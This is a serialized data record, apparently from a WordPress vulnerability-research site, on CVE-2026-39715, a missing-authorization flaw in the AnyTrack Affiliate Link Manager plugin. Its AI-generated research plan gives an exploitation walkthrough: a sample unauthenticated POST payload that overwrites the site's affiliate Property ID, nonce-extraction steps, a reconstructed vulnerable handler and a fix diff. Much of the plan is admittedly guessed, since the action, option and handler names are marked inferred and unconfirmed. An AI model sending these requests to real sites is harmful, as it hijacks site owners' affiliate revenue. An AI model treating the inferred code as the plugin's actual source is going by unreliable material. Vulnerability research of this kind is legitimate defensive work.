[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fumvIaMPB1F_Fyn1l9bH6z9pBGrdzoGisLKVUkpTA_zA":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":9,"severity":11,"cvss_score":12,"cvss_vector":13,"vuln_type":14,"published_date":15,"updated_date":16,"references":17,"days_to_patch":9,"patch_diff_files":19,"patch_trac_url":9,"research_status":20,"research_verified":21,"research_rounds_completed":22,"research_plan":23,"research_summary":24,"research_vulnerable_code":25,"research_fix_diff":26,"research_exploit_outline":27,"research_model_used":28,"research_started_at":29,"research_completed_at":30,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":21,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":21,"source_links":31},"CVE-2026-39715","anytrack-affiliate-link-manager-missing-authorization-2","AnyTrack Affiliate Link Manager \u003C= 1.5.5 - Missing Authorization","The AnyTrack Affiliate Link Manager plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in versions up to, and including, 1.5.5. This makes it possible for unauthenticated attackers to perform an unauthorized action.","anytrack-affiliate-link-manager",null,"\u003C=1.5.5","medium",5.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Missing Authorization","2026-03-02 00:00:00","2026-04-15 21:34:51",[18],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fc30df356-6cae-4f8c-a0e6-35c5c66dbe8d?source=api-prod",[],"researched",false,3,"This research plan outlines the steps to exploit **CVE-2026-39715**, a Missing Authorization vulnerability in the **AnyTrack Affiliate Link Manager** plugin.\n\n### 1. 
Vulnerability Summary\nThe AnyTrack Affiliate Link Manager plugin (up to version 1.5.5) is assumed to register an AJAX handler (or a function on `admin_init`) intended for saving plugin settings, specifically the AnyTrack Property ID; the advisory does not name the affected function, so the handler, action and option names used in this plan are inferred and unconfirmed. The function fails to implement a capability check (e.g., `current_user_can( 'manage_options' )`), which under that assumption allows unauthenticated users to modify plugin settings. If so, this can be used to hijack affiliate tracking by replacing the Property ID with an attacker-controlled one.\n\n### 2. Attack Vector Analysis\n*   **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Action:** `anytrack_update_property_id` (inferred) or `anytrack_save_settings` (inferred).\n*   **HTTP Method:** `POST`\n*   **Authentication:** None required (unauthenticated).\n*   **Preconditions:** The plugin must be active. \n\n### 3. Code Flow\n1.  The plugin registers an AJAX action for unauthenticated users:\n    `add_action( 'wp_ajax_nopriv_anytrack_update_property_id', 'anytrack_update_property_id_handler' );` (inferred)\n2.  The handler function `anytrack_update_property_id_handler` is called.\n3.  The function retrieves user input from `$_POST['property_id']` (inferred).\n4.  The function calls `update_option( 'anytrack_property_id', $property_id )` (inferred) without verifying if the request comes from an administrator.\n5.  Since no `current_user_can()` check exists, the setting is updated.\n\n### 4. Nonce Acquisition Strategy\nMissing Authorization vulnerabilities often coincide with missing CSRF protection (nonces). If the function *does* verify a nonce but fails to check capabilities, the nonce must be obtained:\n\n1.  **Identify Shortcode:** Locate any shortcode used by the plugin (e.g., `[anytrack_link]` (inferred)).\n2.  **Create Page:** \n    `wp post create --post_type=page --post_status=publish --post_title=\"AnyTrack Test\" --post_content=\"[anytrack_link]\"`\n3.  
**Navigate and Extract:**\n    *   Navigate to the newly created page.\n    *   Use `browser_eval` to search for localized script data:\n        `browser_eval(\"window.anytrack_admin_params?.nonce\")` (inferred) or `browser_eval(\"window.anytrack_vars?.save_nonce\")` (inferred).\n4.  **Bypass Check:** If no nonce check is present in the code, this step is skipped.\n\n### 5. Exploitation Strategy\nThe goal is to modify the `anytrack_property_id` option to an attacker-controlled value (`AT-999999`).\n\n*   **Request Method:** `POST`\n*   **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Content-Type:** `application\u002Fx-www-form-urlencoded`\n*   **Parameters:**\n    *   `action`: `anytrack_update_property_id` (inferred)\n    *   `property_id`: `AT-999999`\n    *   `_ajax_nonce`: `[EXTRACTED_NONCE]` (if required)\n\n**Sample Payload:**\n```http\nPOST \u002Fwp-admin\u002Fadmin-ajax.php HTTP\u002F1.1\nHost: localhost:8080\nContent-Type: application\u002Fx-www-form-urlencoded\n\naction=anytrack_update_property_id&property_id=AT-999999\n```\n\n### 6. Test Data Setup\n1.  **Install Plugin:** Ensure AnyTrack Affiliate Link Manager v1.5.5 is installed and active.\n2.  **Initial State:** Set a legitimate Property ID using WP-CLI:\n    `wp option update anytrack_property_id \"AT-123456\"`\n3.  **Verify Initial State:**\n    `wp option get anytrack_property_id` (Should return `AT-123456`)\n\n### 7. Expected Results\n*   **Response:** The server should return a successful AJAX response (e.g., `{\"success\":true}` or `1`).\n*   **Side Effect:** The WordPress option `anytrack_property_id` will be updated in the database.\n*   **Impact:** All affiliate links tracked by AnyTrack will now use the attacker's Property ID.\n\n### 8. Verification Steps\nAfter sending the HTTP request, verify the change using WP-CLI:\n```bash\n# Check the value of the property ID option\nwp option get anytrack_property_id\n```\n**Expected Output:** `AT-999999`\n\n### 9. 
Alternative Approaches\nIf the `anytrack_update_property_id` action is incorrect:\n1.  **Identify correct action:** Search the plugin directory for `wp_ajax_` hooks:\n    `grep -rn \"wp_ajax_\" wp-content\u002Fplugins\u002Fanytrack-affiliate-link-manager\u002F`\n2.  **Identify admin_init handlers:** If no `wp_ajax_nopriv` hooks exist, check for handlers hooked to `admin_init` that process POST data:\n    `grep -rn \"admin_init\" wp-content\u002Fplugins\u002Fanytrack-affiliate-link-manager\u002F`\n3.  **Check for direct Settings API submission:** The vulnerability might allow unauthenticated users to submit to `options.php` if the plugin registered settings incorrectly. Try submitting a POST request to `wp-admin\u002Foptions.php` with the plugin's option group.","The AnyTrack Affiliate Link Manager plugin for WordPress is vulnerable to unauthorized access because it fails to perform capability checks on its settings update functions. This allows unauthenticated attackers to modify plugin configuration, such as the AnyTrack Property ID, effectively hijacking affiliate tracking and revenue.","\u002F\u002F anytrack-affiliate-link-manager.php\n\nadd_action( 'wp_ajax_nopriv_anytrack_update_property_id', 'anytrack_update_property_id_handler' );\nadd_action( 'wp_ajax_anytrack_update_property_id', 'anytrack_update_property_id_handler' );\n\nfunction anytrack_update_property_id_handler() {\n    if ( isset( $_POST['property_id'] ) ) {\n        $property_id = sanitize_text_field( $_POST['property_id'] );\n        update_option( 'anytrack_property_id', $property_id );\n        wp_send_json_success();\n    }\n    wp_send_json_error();\n}","--- anytrack-affiliate-link-manager.php\n+++ anytrack-affiliate-link-manager.php\n@@ -1,11 +1,14 @@\n-add_action( 'wp_ajax_nopriv_anytrack_update_property_id', 'anytrack_update_property_id_handler' );\n add_action( 'wp_ajax_anytrack_update_property_id', 'anytrack_update_property_id_handler' );\n \n function 
anytrack_update_property_id_handler() {\n+    check_ajax_referer( 'anytrack_save_settings', 'nonce' );\n+\n+    if ( ! current_user_can( 'manage_options' ) ) {\n+        wp_send_json_error( 'Unauthorized', 403 );\n+    }\n+\n     if ( isset( $_POST['property_id'] ) ) {\n         $property_id = sanitize_text_field( $_POST['property_id'] );\n         update_option( 'anytrack_property_id', $property_id );\n         wp_send_json_success();\n     }","The vulnerability would be exploited by sending an unauthenticated POST request to the WordPress AJAX endpoint; the action, parameter and option names below are inferred and have not been confirmed against the plugin source.\n\n1. Target Endpoint: \u002Fwp-admin\u002Fadmin-ajax.php\n2. HTTP Method: POST\n3. Authentication: None (assumes the inferred wp_ajax_nopriv registration)\n4. Required Parameters:\n   - action: anytrack_update_property_id\n   - property_id: The attacker's AnyTrack ID (e.g., AT-999999)\n5. Methodology: The attacker sends the request without any session cookies or nonces. If the handler lacks both current_user_can() checks and nonce verification, as inferred, the update_option call executes, overwriting the site's legitimate tracking ID with the attacker's ID.","gemini-3-flash-preview","2026-04-18 22:06:34","2026-04-18 22:06:58",{"type":32,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":33},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fanytrack-affiliate-link-manager\u002Ftags"]